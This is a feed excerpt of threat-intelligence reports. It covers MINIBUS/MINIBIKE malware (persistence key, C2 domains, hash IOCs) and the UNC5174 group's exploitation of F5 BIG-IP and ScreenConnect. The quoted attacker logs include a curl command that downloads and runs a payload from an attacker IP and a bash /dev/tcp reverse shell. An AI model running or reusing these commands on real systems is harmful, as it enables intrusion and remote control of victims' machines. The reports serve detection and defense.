<li>CoreUIComponent.dll - the MINIBUS backdoor (MD5: 816af741c3d6be1397d306841d12e206)</li>
<li>essential.dat - an additional archive containing decoy content: a “Bring Them Home” fake .NET application created by  the threat actor (MD5: 251894b3af0ece374ed6df223ab09cab)</li>
</ul>
</li>
<li><strong>Execution:</strong> Once the legitimate executable is run, the MINIBUS installer is installed via search-order-hijacking (SoH). </li>
</ul>
<p>The installer DLL displays a message indicating the files are being extracted:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig10.max-1000x1000.png" alt="MINIBUS installer DLL installation message">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 10: MINIBUS installer DLL installation message</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>The decoy contents are moved to their intended location on the targeted system:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig11.max-1000x1000.png" alt="Installer DLL message box">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="dji4b">Figure 11: Installer DLL message box</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Two main decoy files are contained within the ZIP archive along with some dependency files, essential.dat (MD5: 251894b3af0ece374ed6df223ab09cab):</p>
<ul>
<li>
<p>Decoy .NET application masquerading as an application related to Israeli hostages kidnapped by Hamas during the Oct. 7 attack on Israel: <em>&lt;extraction_directory&gt;\BringThemeHomeNow\BringThemeHomeNow.exe [sic] (MD5: dfed4468dd78ad2f5d762741df4c1755)</em></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig12.max-1000x1000.png" alt="Fake “Bring Them Home Now”.NET application “BringThemeHomeNow.exe” [sic]">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="dji4b">Figure 12: Fake “Bring Them Home Now”.NET application “BringThemeHomeNow.exe” [sic]</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li>Decoy image: <em>&lt;extraction_directory&gt;\BringThemeHomeNow\petition.jpg (MD5: c0060a0c26df9fed7fdcdb7d26ff921f)</em></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig4-fig13-blurred.max-1000x1000.png" alt="Decoy content used by MINIBUS, related to the “Bring Them Home Now” movement">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="dji4b">Figure 13: Decoy content "petition.jpg"</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Upon execution, the .NET application initially checks of the existence of a flag file that indicates if the decoy has previously run on the device: <em>%LOCALAPPDATA%\Commons\lg</em></p>
<p>If the file does not exist, a splash screen is displayed prior to entering the application. If the file already exists, the application presents the main screen (seen in Figure 12).</p>
<p>In addition to displaying decoy content to the victim, the installer DLL copies the backdoor and dependency files to their staging directory, and it also sets persistence for the backdoor using the following registry run key:</p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td>
<p><em><strong>Key: </strong>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveCoUpdate</em></p>
<p><em><strong>Value: </strong>%LOCALAPPDATA%\Microsoft\OneDrive\cache\logger\FileCoAuth.exe</em></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><ul>
<li><strong>C2 infrastructure: </strong>This version of MINIBIKE communicates with one Azure subdomain and two dedicated domains:
<ul>
<li><em>vscodeupdater[.]azurewebsites[.]net</em></li>
<li><em>cashcloudservices[.]com</em></li>
<li><em>xboxplayservice[.]com</em></li>
</ul>
</li>
<li><strong>Affected geographies:</strong> Israel and India, as well as possibly UAE and Albania, based on the following subdomains of cashcloudservices[.]com:
<ul>
<li><em><strong>dubai-ae</strong>0043[.]cashcloudservices[.]com</em></li>
<li><em>ns<strong>albania</strong>hack[.]cashcloudservices[.]com</em></li>
</ul>
</li>
</ul>
<h3>Detection and Mitigation</h3>
<p>If you are a Google Chronicle Enterprise+ customer, Chronicle rules were released to your <a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category"><u>Emerging Threats</u></a> rule pack, and IOCs listed in this blog post are available for prioritization with <a href="https://cloud.google.com/chronicle/docs/detection">Applied Threat Intelligence</a>.  </p>
<h3>Indicators of Compromise (IOCs)</h3>
<h4>MINIBIKE</h4>
<ul>
<li>
<p>01cbaddd7a269521bf7b80f4a9a1982f</p>
</li>
<li>
<p>054c67236a86d9ab5ec80e16b884f733</p>
</li>
<li>
<p>1d8a1756b882a19d98632bc6c1f1f8cd</p>
</li>
<li>
<p>2c4cdc0e78ef57b44f11f7ec2f6164cd</p>
</li>
<li>
<p>3b658afa91ce3327dbfa1cf665529a6d</p>
</li>
<li>
<p>409c2ac789015e76f9886f1203a73bc0</p>
</li>
<li>
<p>601eb396c339a69e7d8c2a3de3b0296d</p>
</li>
<li>
<p>664cfda4ada6f8b7bb25a5f50cccf984</p>
</li>
<li>
<p>68f6810f248d032bbb65b391cdb1d5e0</p>
</li>
<li>
<p>691d0143c0642ff783909f983ccb8ffd</p>
</li>
<li>
<p>710d1a8b2fc17c381a7f20da5d2d70fc</p>
</li>
<li>
<p>75d2c686d410ec1f880a6fd7a9800055</p>
</li>
<li>
<p>909a235ac0349041b38d84e9aab3f3a1</p>
</li>
<li>
<p>a5e64f196175c5f068e1352aa04bc5fa</p>
</li>
<li>
<p>adef679c6aa6860aa89b775dceb6958b</p>
</li>
<li>
<p>bfd024e64867e6ca44738dd03d4f87b5</p>
</li>
<li>
<p>c12ff86d32bd10c6c764b71728a51bce</p>
</li>
<li>
<p>cf32d73c501d5924b3c98383f53fda51</p>
</li>
<li>
<p>d94ffe668751935b19eaeb93fed1cdbe</p>
</li>
<li>
<p>e3dc8810da71812b860fc59aeadcc350</p>
</li>
<li>
<p>e9ed595b24a7eeb34ac52f57eeec6e2b</p>
</li>
<li>
<p>eadbaabe3b8133426bcf09f7102088d4</p>
</li>
</ul>
<h4>MINIBUS</h4>
<ul>
<li>
<p>ef262f571cd429d88f629789616365e4</p>
</li>
<li>
<p>816af741c3d6be1397d306841d12e206</p>
</li>
<li>
<p>c5dc2c75459dc99a42400f6d8b455250</p>
</li>
<li>
<p>05fcace605b525f1bece1813bb18a56c</p>
</li>
<li>
<p>4ed5d74a746461d3faa9f96995a1eec8</p>
</li>
<li>
<p>f58e0dfb8f915fa5ce1b7ca50c46b51b</p>
</li>
</ul>
<h4>LIGHTRAIL</h4>
<ul>
<li>
<p>0a739dbdbcf9a5d8389511732371ecb4</p>
</li>
<li>
<p>36e2d9ce19ed045a9840313439d6f18d</p>
</li>
<li>
<p>aaef98be8e58be6b96566268c163b6aa</p>
</li>
<li>
<p>c3830b1381d95aa6f97a58fd8ff3524e</p>
</li>
<li>
<p>c51bc86beb9e16d1c905160e96d9fa29</p>
</li>
<li>
<p>a5fdf55c1c50be471946de937f1e46dd</p>
</li>
</ul>
<h4>Fake Job Offers</h4>
<ul>
<li>
<p>ec6a0434b94f51aa1df76a066aa05413</p>
</li>
<li>
<p>89107ce5e27d52b9fa6ae6387138dd3e</p>
</li>
<li>
<p>4a223bc9c6096ac6bae3e7452ed6a1cd</p>
</li>
</ul>
<h4>C2 and Hosting Infrastructure</h4>
<ul>
<li>
<p>1stemployer[.]com</p>
</li>
<li>
<p>birngthemhomenow[.]co[.]il</p>
</li>
<li>
<p>cashcloudservices[.]com</p>
</li>
<li>
<p>jupyternotebookcollections[.]com</p>
</li>
<li>
<p>notebooktextcheckings[.]com</p>
</li>
<li>
<p>teledyneflir[.]com[.]de</p>
</li>
<li>
<p>vsliveagent[.]com</p>
</li>
<li>
<p>xboxplayservice[.]com</p>
</li>
</ul>
<h4>Azure Subdomains</h4>
<ul>
<li>
<p>airconnectionapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>airconnectionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>airconnectionsapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>airgadgetsolution[.]azurewebsites[.]net</p>
</li>
<li>
<p>airgadgetsolutions[.]azurewebsites[.]net</p>
</li>
<li>
<p>altnametestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>answerssurveytest[.]azurewebsites[.]net</p>
</li>
<li>
<p>apphrquestion[.]azurewebsites[.]net</p>
</li>
<li>
<p>apphrquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>apphrquizapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>arquestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>arquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>audiomanagerapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>audioservicetestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>blognewsalphaapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>blogvolleyballstatusapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>blogvolleyballstatus[.]azurewebsites[.]net</p>
</li>
<li>
<p>boeisurveyapplications[.]azurewebsites[.]net</p>
</li>
<li>
<p>browsercheckap[.]azurewebsites[.]net</p>
</li>
<li>
<p>browsercheckingapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>browsercheckjson[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestionstypeapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestionstypejsonapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestiontypesapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestiontypes[.]azurewebsites[.]net</p>
</li>
<li>
<p>checkapicountryquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>checkapicountryquestionsjson[.]azurewebsites[.]net</p>
</li>
<li>
<p>checkservicecustomerapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>coffeeonlineshop[.]azurewebsites[.]net</p>
</li>
<li>
<p>coffeeonlineshoping[.]azurewebsites[.]net</p>
</li>
<li>
<p>connectairapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>connectionhandlerapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>countrybasedquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>customercareserviceapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>customercareservice[.]azurewebsites[.]net</p>
</li>
<li>
<p>emiratescheckapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>emiratescheckapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>engineeringrssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>engineeringssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>exchtestcheckingapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>exchtestcheckingapihealth[.]azurewebsites[.]net</p>
</li>
<li>
<p>flighthelicopterahtest[.]azurewebsites[.]net</p>
</li>
<li>
<p>helicopterahtest[.]azurewebsites[.]net</p>
</li>
<li>
<p>helicopterahtests[.]azurewebsites[.]net</p>
</li>
<li>
<p>helicoptersahtests[.]azurewebsites[.]net</p>
</li>
<li>
<p>hiringarabicregion[.]azurewebsites[.]net</p>
</li>
<li>
<p>homefurniture[.]azurewebsites[.]net</p>
</li>
<li>
<p>hrapplicationtest[.]azurewebsites[.]net</p>
</li>
<li>
<p>humanresourcesapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>humanresourcesapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>humanresourcesapiquiz[.]azurewebsites[.]net</p>
</li>
<li>
<p>iaidevrssfeed[.]centralus[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>iaidevrssfeed[.]centrualus[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>iaidevrssfeed[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>iaidevrssfeedp[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>identifycheckapplication[.]azurewebsites[.]net</p>
</li>
<li>
<p>identifycheckapplications[.]azurewebsites[.]net</p>
</li>
<li>
<p>identifycheckingapplications[.]azurewebsites[.]net</p>
</li>
<li>
<p>ilengineeringrssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>integratedblognewfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>integratedblognewsapi[.]azurewebsites[.]com</p>
</li>
<li>
<p>integratedblognewsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>integratedblognews[.]azurewebsites[.]net</p>
</li>
<li>
<p>intengineeringrssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>intergratedblognewsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntime[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimestestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimetestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimeversioncheckingapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimeversionchecking[.]azurewebsites[.]net</p>
</li>
<li>
<p>jupyternotebookcollection[.]azurewebsites[.]net</p>
</li>
<li>
<p>jupyternotebookcollections[.]azurewebsites[.]net</p>
</li>
<li>
<p>jupyternotebookscollection[.]azurewebsites[.]net</p>
</li>
<li>
<p>logsapimanagement[.]azurewebsites[.]net</p>
</li>
<li>
<p>logsapimanagements[.]azurewebsites[.]net</p>
</li>
<li>
<p>logupdatemanagementapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>logupdatemanagementapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>manpowerfeedapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>manpowerfeedapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>marineblogapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>notebooktextchecking[.]azurewebsites[.]net</p>
</li>
<li>
<p>notebooktextcheckings[.]azurewebsites[.]net</p>
</li>
<li>
<p>notebooktexts[.]azurewebsites[.]net</p>
</li>
<li>
<p>onequestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>onequestionsapicheck[.]azurewebsites[.]net</p>
</li>
<li>
<p>onequestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>openapplicationcheck[.]azurewebsites[.]net</p>
</li>
<li>
<p>optionalapplication[.]azurewebsites[.]net</p>
</li>
<li>
<p>personalitytestquestionapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>personalizationsurvey[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestionapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestionsapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>queryfindquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>queryquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsapplicationapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsapplicationapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsapplicationbackup[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsdatabases[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsurveyapp[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsurveyappserver[.]azurewebsites[.]net</p>
</li>
<li>
<p>quiztestapplication[.]azurewebsites[.]net</p>
</li>
<li>
<p>refaeldevrssfeed[.]centralus[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>regionuaequestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>registerinsurance[.]azurewebsites[.]net</p>
</li>
<li>
<p>roadmapselectorapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>roadmapselector[.]azurewebsites[.]net</p>
</li>
<li>
<p>sportblogs[.]azurewebsites[.]net</p>
</li>
<li>
<p>surveyappquery[.]azurewebsites[.]net</p>
</li>
<li>
<p>surveyonlinetestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>surveyonlinetest[.]azurewebsites[.]net</p>
</li>
<li>
<p>technewsblogapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>testmanagementapi1[.]azurewebsites[.]net</p>
</li>
<li>
<p>testmanagementapis[.]azurewebsites[.]net</p>
</li>
<li>
<p>testmanagementapisjson[.]azurewebsites[.]net</p>
</li>
<li>
<p>testquestionapplicationapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>testtesttes[.]azurewebsites[.]net</p>
</li>
<li>
<p>tiappschecktest[.]azurewebsites[.]net</p>
</li>
<li>
<p>tnlsowkis[.]westus3[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>tnlsowki[.]westus3[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>turkairline[.]azurewebsites[.]net</p>
</li>
<li>
<p>uaeaircheckon[.]azurewebsites[.]net</p>
</li>
<li>
<p>uaeairchecks[.]azurewebsites[.]net</p>
</li>
<li>
<p>vscodeupdater[.]azurewebsites[.]net</p>
</li>
<li>
<p>workersquestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>workersquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>workersquestionsjson[.]azurewebsites[.]net</p>
</li>
</ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect]]></title>
<description><![CDATA[Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen

 
During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface. Addit...]]></description>
<link>https://tsecurity.de/de/3578874/it-security-nachrichten/bringing-access-back-initial-access-brokers-exploit-f5-big-ip-cve-2023-46747-and-screenconnect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578874/it-security-nachrichten/bringing-access-back-initial-access-brokers-exploit-f5-big-ip-cve-2023-46747-and-screenconnect/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46747" rel="noopener" target="_blank"><u>CVE-2023-46747</u></a> affecting F5 BIG-IP Traffic Management User Interface. Additionally, in February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor. This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174.</p>
<p>Mandiant assesses UNC5174 (believed to use the persona "Uteus") is a former member of Chinese hacktivist collectives that has since shown indications of acting as a contractor for China's Ministry of State Security (MSS) focused on executing access operations. UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, UK government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation. In February 2024, UNC5174 was observed exploiting <a href="https://cloud.google.com/blog/topics/threat-intelligence/connectwise-screenconnect-hardening-remediation" rel="noopener" target="_blank"><u>ConnectWise ScreenConnect vulnerability</u></a> (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-1709" rel="noopener" target="_blank"><u>CVE-2024-1709</u></a>) to compromise hundreds of institutions primarily in the U.S. and Canada.</p>
<h2>Targeting and Timeline</h2>
<p>UNC5174 has been linked to widespread aggressive targeting and intrusions of Southeast Asian and U.S. research and education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs), and U.S. and UK government organizations during October and November 2023, as well as in February 2024.</p>
<p>The actor appears primarily focused on executing access operations. Mandiant observed UNC5174 exploiting various vulnerabilities during this time.</p>
<ul>
<li>ConnectWise ScreenConnect Vulnerability CVE-2024-1709</li>
<li>F5 BIG-IP Configuration Utility Authentication Bypass Vulnerability CVE-2023-46747</li>
<li>Atlassian Confluence CVE-2023-22518</li>
<li>Linux Kernel Exploit CVE-2022-0185</li>
<li>Zyxel Firewall OS Command Injection Vulnerability CVE-2022-30525</li>
</ul>
<p>Investigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command history. This history detailed artifacts of extensive reconnaissance, web application fuzzing, and aggressive scanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania, and Hong Kong regions. Additionally, key strategic targets like think tanks in the U.S. and Taiwan were identified; however, Mandiant does not have significant evidence to determine successful exploitation of these targets.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig1.max-1000x1000.jpg" alt="UNC5174 global targeting map">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="8pnka">Figure 1: UNC5174 global targeting map</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Initial Disclosure of CVE-2023-46747</h2>
<p>On Oct. 25, 2023, Praetorian published an <a href="https://www.praetorian.com/blog/advisory-f5-big-ip-rce/" rel="noopener" target="_blank"><u>advisory</u></a> and proof-of-concept (PoC) for a zero-day (0-day) vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46747" rel="noopener" target="_blank"><u>CVE-2023-46747</u></a>) impacting the F5 BIG-IP Traffic Management User Interface (TMUI). This vulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user. The blog post also detailed steps required for successful exploitation, involving Apache JServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute bash commands via the F5 Traffic Management Shell (TMSH). Following the initial advisory, F5 published a security advisory on Oct. 27, 2023. The <a href="https://my.f5.com/manage/s/article/K000137353" rel="noopener" target="_blank"><u>advisory</u></a> detailed the affected F5 appliance versions and provided a script for mitigating the vulnerability. Mandiant strongly recommends organizations apply the mitigation script to vulnerable F5 BIG-IP appliances and investigate for evidence of compromise.</p>
<h2>Evidence of Exploitation</h2>
<p>Mandiant identified UNC5174 compromising F5 BIG-IP appliances, which exhibited evidence of administrative user account creation and execution of bash commands via the TMSH. Through investigation it became apparent that UNC5174 had exploited CVE-2023-46747 to perform actions on the appliance like account creation. The anomalous behavior appeared first in the "<em><strong>/var/log/audit</strong></em>" log file, which recorded evidence of the creation of new admin user accounts and bash commands executed by the newly created user via the F5's TMSH. This action also resulted in the creation of the same new user account on the underlying operating system, including the following entries:</p>
<ul>
<li><em><strong>/etc/passwd</strong></em></li>
<li><em><strong>/etc/shadow</strong></em></li>
<li>The creation of the user's home directory was also replicated at <em><strong>/home/&lt;username&gt;</strong></em>.</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Oct 28 01:52:32 localhost.localdomain notice tmsh[30629]: 
01420002:5: AUDIT - pid=30629 user=root folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=create 
auth user f5support3 password **** shell bash partition-access 
add { all-partitions { role admin } }

Oct 28 01:53:29 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=f5support3 folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash -c id</code></pre>
<p><span>Table 1: Compromised host Audit log. Note the compromised appliance recorded timestamps in local time.</span></p></div>
<div class="block-paragraph_advanced"><p>The "<em><strong>/var/log/restjavad-audit.log</strong></em>" recorded evidence of malicious requests to the REST API, including user account, HTTP request method, API endpoint, and source IP address. In the following example, UNC5174 authenticated and executed bash commands on the underlying operating system as the newly created user "<em><strong>f5support3</strong></em>". The following log entries show the <em><strong>f5support3</strong></em> user executing bash commands. The body of the POST request contains the bash command being executed.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>[I][8602][27 Oct 2023 14:53:29 UTC][ForwarderPassThroughWorker] 
{"user":"local/f5support3","method":"POST","uri":"http://localhost:8100
/mgmt/tm/util/bash","status":200,"from":"154.12.177[.]8"}

[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker] 
{"user":"local/f5support3","method":"PATCH","uri":"http://localhost:8100
/mgmt/shared/authz/users/f5support3","status":200,"from":"154.12.177[.]8"}
</code></pre>
<p><span>Table 2: UNC5174 bash commands with newly created username f5support3</span></p></div>
<div class="block-paragraph_advanced"><p>UNC5174 then created new accounts via the F5 TMUI, attempting to appear as legitimate F5-related user accounts, including:</p>
<ul>
<li>F5support3</li>
<li>F5_admin</li>
<li>f5_support</li>
</ul>
<h2>Post-Exploitation Tactics by UNC5174 After Successful Account Creation</h2>
<h3>SNOWLIGHT, GOHEAVY, GOREVERSE, and SUPERSHELL</h3>
<p>UNC5174 leveraged their newly minted TMSH access to download and execute "/tmp/watchsys" using a cURL command. Mandiant's analysis of the file "/tmp/watchsys" identified it as a new 64-bit ELF downloader we have named <u>SNOWLIGHT</u>.</p>
<p>The following chained bash` commands attributed to UNC5174 will perform the following actions related to SNOWLIGHT: </p>
<ol>
<li>Delete any file previously written to /tmp/watchsys.</li>
<li>Forcefully kill the process "watchsys" if it is running.</li>
<li>Download the file from a remote URL to /tmp/watchsys.</li>
<li>Modify the permissions of /tmp/watchsys to allow execution.</li>
<li>Execute /tmp/watchsys using "nohup", so that the process will continue executing after the parent process is terminated.</li>
<li>Perform a directory listing of the /tmp directory.</li>
</ol></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:29:47 localhost.localdomain notice icrd_child[17602]: 
01420002:5: AUDIT - pid=17602 user=admin folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash 
-c "rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys 
http://172.104.124[.]74/LG;chmod 755 /tmp/watchsys;nohup 
/tmp/watchsys &amp;;ls -al /tmp/"</code></pre>
<p><span>Table 3: UNC5174 cURL command to download SNOWLIGHT downloader</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig2.max-1000x1000.png" alt="Excerpt showing SNOWLIGHT's decoding routine and memory injection method">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="kdtvq">Figure 2: Excerpt showing SNOWLIGHT's decoding routine and memory injection method</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>SNOWLIGHT is a downloader written in C and is designed to run on Linux systems. SNOWLIGHT uses raw sockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with the command-and-control (C2 or C&amp;C) server, though one variant has been observed using a fake HTTP header for an initial beacon packet. Upon successful communication with its C2 server, a secondary ELF file is downloaded and XOR decoded using the key "0x99".</p>
<p>Finally, the decoded secondary ELF file is loaded into memory using Linux's "sys_memfd_create" and executed via "fexecve". The payload is downloaded directly into memory and executed without ever being written to disk. In the SNOWLIGHT variants we observed, the payloads process will run under the hard-coded name of "". This is identifiable in a running process list as a "memfd" process.</p>
<p>The SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that Mandiant has dubbed GOHEAVY from infrastructure related to SUPERSHELL administrators. This payload is then executed in-memory via the previously described memfd method. The resultant GOHEAVY process-related artifacts were observed on the compromised F5 appliance:</p>
<ul>
<li>Process Name: memfd:a (deleted)</li>
<li>Path: empty (due to the executable being un-backed)</li>
<li>Args: ?</li>
<li>User: root</li>
</ul>
<p>GOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell (SSH). Mandiant observed UNC5174 deploy GOREVERSE, which called back to C2 infrastructure we previously observed hosting the SUPERSHELL framework. SUPERSHELL is a publicly available C2 framework published on GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL. </p>
<p>Mandiant observed evidence of UNC5174 issuing commands to connect bash and netcat TCP reverse shells back to the same infrastructure hosting GOREVERSE and SUPERSHELL payloads on port 443.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:16:15 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=admin folder=
/Common module=(tmos)# status=[Command OK] cmd_data=run util 
bash -c "bash -i /dev/tcp/172.104.124[.]74/443 0&gt;&amp;1 &amp;"|</code></pre>
<p><span>Table 4: UNC5174 command to download a bash web shell</span></p></div>
